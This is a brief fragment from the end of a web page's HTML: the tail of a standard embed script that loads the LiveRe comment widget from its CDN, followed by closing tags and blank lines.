        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  





  

  

  
  

  

  

  

</body>
</html>
